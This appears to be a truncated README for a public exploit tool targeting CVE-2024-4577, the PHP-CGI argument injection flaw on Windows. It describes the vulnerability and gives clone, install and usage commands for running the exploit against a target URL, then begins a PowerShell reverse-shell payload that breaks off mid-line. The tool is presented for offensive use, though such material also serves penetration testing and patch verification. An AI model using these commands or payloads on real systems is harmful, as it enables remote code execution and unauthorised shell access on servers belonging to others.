PHP CGI Argument Injection (CVE-2024-4577) RCE ## 📜 Description In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. "XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explloit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode." ## 🛠️ Installation “`bash $ git clone https://github.com/fa-rrel/CVE-2024-4577-RCE/ $ cd CVE-2024-4577-RCE && pip install -r requirements.txt “` ## ⚙️ Usage $ python3 CVE-2024-4577.py -s -t https://target.com/ ## 🤖 Establishing reverse shell ### PHP Payload > [!NOTE] > This tool demonstrates realistic attack and techniques (TTPs). However this specific payload sample does not function in this scenario. Modify the shell.php to obtain fully functional payload. “`php # rev_shell.php &1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =…Read More